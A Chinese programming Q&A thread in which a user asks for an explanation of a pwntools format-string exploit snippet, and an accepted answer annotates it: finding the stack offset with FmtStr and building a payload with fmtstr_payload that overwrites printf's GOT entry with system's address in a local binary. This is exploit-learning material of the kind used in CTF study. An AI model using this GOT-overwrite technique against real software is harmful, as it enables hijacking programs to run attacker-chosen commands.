m0_54741246 2022-09-22 23:25 采纳率: 50%
浏览 66
已结题

pwntools 字符串漏洞利用工具

def exec_fmt(payload):
io.sendline(payload)
info = io.recv()
return info
auto = FmtStr(exec_fmt)
offest = auto.offest

payload = fmtstr_payload(offest,{printf_got : system_addr})
有没有带老详细解释一下啊这段啊

  • 写回答

2条回答 默认 最新

  • 不太能吃 2022-09-23 08:57
    关注

    pwn格式化字符串漏洞过程,一般会分两大步实现漏洞利用:

    1. 构造一个payload来寻找输入字符串到栈顶指针的偏移;
    2. 攻击,就是利用找到的偏移,在偏移处填入目的地址可以实现目的地址的内容泄露以及内容改写
      知道了基本步骤,就不难理解以下代码了
    def exec_fmt(payload):  //定义运行函数
        io = process('./auth')  //循环暴力求解,需要加该函数
        io.sendline(payload)  //发送一行数据,相当于在数据末尾加\n
        info = io.recv()  //接收数据
        return info  //将接收的数据作为函数返回值返回
    
    auto = FmtStr(exec_fmt)  //格式化,将运行函数作为参数传入FmtStr()中,运行函数的返回值则作为FmtStr()的参数
    offest = auto.offest  //通过格式化后的信息得到偏移offset
    
    payload = fmtstr_payload(offest,{printf_got : system_addr})  //自动生成格式化字符串
    //其中第一个参数offset为前面计算所得,第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT:systemAddress}
    
    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论 编辑记录
查看更多回答(1条)

报告相同问题?

问题事件

  • 系统已结题 10月1日
  • 已采纳回答 9月23日
  • 创建了问题 9月22日

悬赏问题

  • ¥15 x趋于0时tanx-sinx极限可以拆开算吗
  • ¥500 把面具戴到人脸上,请大家贡献智慧
  • ¥15 任意一个散点图自己下载其js脚本文件并做成独立的案例页面,不要作在线的,要离线状态。
  • ¥15 各位 帮我看看如何写代码,打出来的图形要和如下图呈现的一样,急
  • ¥30 c#打开word开启修订并实时显示批注
  • ¥15 如何解决ldsc的这条报错/index error
  • ¥15 VS2022+WDK驱动开发环境
  • ¥30 关于#java#的问题,请各位专家解答!
  • ¥30 vue+element根据数据循环生成多个table,如何实现最后一列 平均分合并
  • ¥20 pcf8563时钟芯片不启振